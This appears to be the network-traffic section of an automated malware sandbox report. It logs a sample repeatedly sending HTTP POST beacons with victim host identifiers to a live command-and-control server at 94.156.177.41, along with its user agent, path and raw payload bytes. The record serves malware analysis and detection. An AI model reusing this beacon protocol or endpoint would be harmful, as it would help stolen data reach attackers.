                            Jan 11, 2025 07:46:07.108112097 CET805009094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:07.242539883 CET5009180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:07.247459888 CET805009194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:07.247535944 CET5009180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:07.250516891 CET5009180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:07.255374908 CET805009194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:07.255436897 CET5009180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:07.260277987 CET805009194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:07.967211008 CET805009194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:07.967298985 CET805009194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:07.967380047 CET5009180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:07.969109058 CET5009180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:07.974126101 CET805009194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:08.125329971 CET5009280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:08.130305052 CET805009294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:08.130470991 CET5009280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:08.133380890 CET5009280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:08.138242960 CET805009294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:08.138322115 CET5009280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:08.143289089 CET805009294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:08.856152058 CET805009294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:08.856239080 CET805009294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:08.856364965 CET5009280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:08.856364965 CET5009280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:08.861511946 CET805009294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.017049074 CET5009380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.024060965 CET805009394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.024182081 CET5009380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.026247025 CET5009380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.033284903 CET805009394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.033339024 CET5009380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.040050030 CET805009394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.755974054 CET805009394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.756000042 CET805009394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.756222010 CET5009380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.756222010 CET5009380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.761086941 CET805009394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.897703886 CET5009480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.902683973 CET805009494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.902792931 CET5009480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.905754089 CET5009480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.910531044 CET805009494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:09.910608053 CET5009480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:09.915446043 CET805009494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:10.621844053 CET805009494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:10.621882915 CET805009494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:10.621993065 CET5009480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:10.623661041 CET5009480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:10.628603935 CET805009494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:10.785003901 CET5009580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:10.790160894 CET805009594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:10.790271044 CET5009580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:10.792256117 CET5009580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:10.797972918 CET805009594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:10.798043966 CET5009580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:10.803627968 CET805009594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:11.520802021 CET805009594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:11.520869017 CET805009594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:11.520962954 CET5009580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:11.521015882 CET5009580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:11.525940895 CET805009594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:11.678774118 CET5009680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:11.683864117 CET805009694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:11.683960915 CET5009680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:11.685985088 CET5009680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:11.690910101 CET805009694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:11.690984964 CET5009680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:11.695800066 CET805009694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:12.414182901 CET805009694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:12.414223909 CET805009694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:12.414303064 CET5009680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:12.414346933 CET5009680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:12.419182062 CET805009694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:12.551348925 CET5009780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:12.556387901 CET805009794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:12.556456089 CET5009780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:12.558747053 CET5009780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:12.563587904 CET805009794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:12.563647032 CET5009780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:12.568600893 CET805009794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:13.286118984 CET805009794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:13.286164045 CET805009794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:13.286242008 CET5009780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:13.287667990 CET5009780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:13.292706966 CET805009794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:13.425811052 CET5009880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:13.430789948 CET805009894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:13.430890083 CET5009880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:13.432965040 CET5009880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:13.437767982 CET805009894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:13.437851906 CET5009880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:13.442780972 CET805009894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:14.163225889 CET805009894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:14.163284063 CET805009894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:14.163374901 CET5009880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:14.165795088 CET5009880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:14.170613050 CET805009894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:14.297678947 CET5009980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:14.302766085 CET805009994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:14.302880049 CET5009980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:14.305083990 CET5009980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:14.310038090 CET805009994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:14.311717033 CET5009980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:14.316606998 CET805009994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.039928913 CET805009994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.039987087 CET805009994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.040083885 CET5009980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.040155888 CET5009980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.044891119 CET805009994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.184257984 CET5010080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.189363956 CET805010094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.189460039 CET5010080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.191468000 CET5010080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.196350098 CET805010094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.196450949 CET5010080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.201316118 CET805010094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.899775028 CET805010094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.899909019 CET805010094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:15.899908066 CET5010080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.899960995 CET5010080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:15.904778004 CET805010094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.054841995 CET5010180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.059674978 CET805010194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.059812069 CET5010180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.062007904 CET5010180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.066858053 CET805010194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.066977024 CET5010180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.071876049 CET805010194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.788527966 CET805010194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.788579941 CET805010194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.788671970 CET5010180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.788671970 CET5010180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.796097994 CET805010194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.934180021 CET5010280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.939819098 CET805010294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.939929008 CET5010280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.941674948 CET5010280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.947079897 CET805010294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:16.947180033 CET5010280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:16.951956987 CET805010294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:17.639245987 CET805010294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:17.639271975 CET805010294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:17.639410973 CET5010280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:17.639450073 CET5010280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:17.644507885 CET805010294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:17.783998013 CET5010380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:17.788950920 CET805010394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:17.789031029 CET5010380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:17.791002989 CET5010380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:17.795767069 CET805010394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:17.795814037 CET5010380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:17.800664902 CET805010394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:18.635993958 CET805010394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:18.636082888 CET805010394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:18.636149883 CET5010380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:18.636149883 CET5010380192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:18.641050100 CET805010394.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:18.783993006 CET5010480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:18.788842916 CET805010494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:18.788943052 CET5010480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:18.791034937 CET5010480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:18.795792103 CET805010494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:18.795869112 CET5010480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:18.800628901 CET805010494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:19.502355099 CET805010494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:19.502382994 CET805010494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:19.502501965 CET5010480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:19.502549887 CET5010480192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:19.507350922 CET805010494.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:19.664300919 CET5010580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:19.669946909 CET805010594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:19.670160055 CET5010580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:19.672302961 CET5010580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:19.677970886 CET805010594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:19.678030014 CET5010580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:19.682795048 CET805010594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:20.387223005 CET805010594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:20.387383938 CET5010580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:20.387435913 CET805010594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:20.387485027 CET5010580192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:20.392302990 CET805010594.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:20.533061028 CET5010680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:20.538218021 CET805010694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:20.538305044 CET5010680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:20.540424109 CET5010680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:20.545344114 CET805010694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:20.545406103 CET5010680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:20.550228119 CET805010694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:21.299537897 CET805010694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:21.299722910 CET5010680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:21.301728964 CET805010694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:21.301790953 CET5010680192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:21.304554939 CET805010694.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:21.438968897 CET5010780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:21.443867922 CET805010794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:21.443936110 CET5010780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:21.445941925 CET5010780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:21.450747013 CET805010794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:21.450793982 CET5010780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:21.455559969 CET805010794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:22.344794035 CET805010794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:22.344862938 CET805010794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:22.345031977 CET5010780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:22.345088959 CET5010780192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:22.349940062 CET805010794.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:22.486140013 CET5010880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:22.491293907 CET805010894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:22.491384983 CET5010880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:22.493406057 CET5010880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:22.498229027 CET805010894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:22.498284101 CET5010880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:22.503060102 CET805010894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:23.228400946 CET805010894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:23.228494883 CET5010880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:23.228574038 CET805010894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:23.228615999 CET5010880192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:23.233336926 CET805010894.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:23.359004021 CET5010980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:23.364626884 CET805010994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:23.364696980 CET5010980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:23.366950035 CET5010980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:23.372528076 CET805010994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:23.372577906 CET5010980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:23.378117085 CET805010994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.078866959 CET805010994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.078933001 CET805010994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.079216957 CET5010980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.079265118 CET5010980192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.084214926 CET805010994.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.208570004 CET5011080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.213582993 CET805011094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.213681936 CET5011080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.215676069 CET5011080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.220513105 CET805011094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.220617056 CET5011080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.225471020 CET805011094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.943252087 CET805011094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.943310976 CET805011094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:24.943362951 CET5011080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.943409920 CET5011080192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:24.948270082 CET805011094.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.083512068 CET5011180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.088705063 CET805011194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.088794947 CET5011180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.090544939 CET5011180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.095357895 CET805011194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.095419884 CET5011180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.100285053 CET805011194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.811788082 CET805011194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.812031031 CET805011194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.812030077 CET5011180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.812098026 CET5011180192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.816845894 CET805011194.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.945693016 CET5011280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.950799942 CET805011294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.951678991 CET5011280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.953727007 CET5011280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.958596945 CET805011294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:25.958652973 CET5011280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:25.963481903 CET805011294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:26.689274073 CET805011294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:26.689300060 CET805011294.156.177.41192.168.2.5
                            Jan 11, 2025 07:46:26.689397097 CET5011280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:26.689398050 CET5011280192.168.2.594.156.177.41
                            Jan 11, 2025 07:46:26.694307089 CET805011294.156.177.41192.168.2.5
                            • 94.156.177.41
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.54970794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:25.594582081 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 180
                            Connection: close
                            Jan 11, 2025 07:44:25.599550009 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: 'ckav.rualfons841618ALFONS-PCk0FDD42EE188E931437F4FBE2CztldF
                            Jan 11, 2025 07:44:26.317852020 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.54970894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:26.510052919 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 180
                            Connection: close
                            Jan 11, 2025 07:44:26.514900923 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: 'ckav.rualfons841618ALFONS-PC+0FDD42EE188E931437F4FBE2C9zHFD
                            Jan 11, 2025 07:44:27.217266083 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:27 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.54970994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:27.302273989 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:27.307244062 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:28.030574083 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:27 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.54971194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:28.186079979 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:28.191010952 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:28.931834936 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.54971394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:29.091341972 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:29.096261024 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:29.967045069 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:29 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.54971494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:30.125305891 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:30.130805016 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
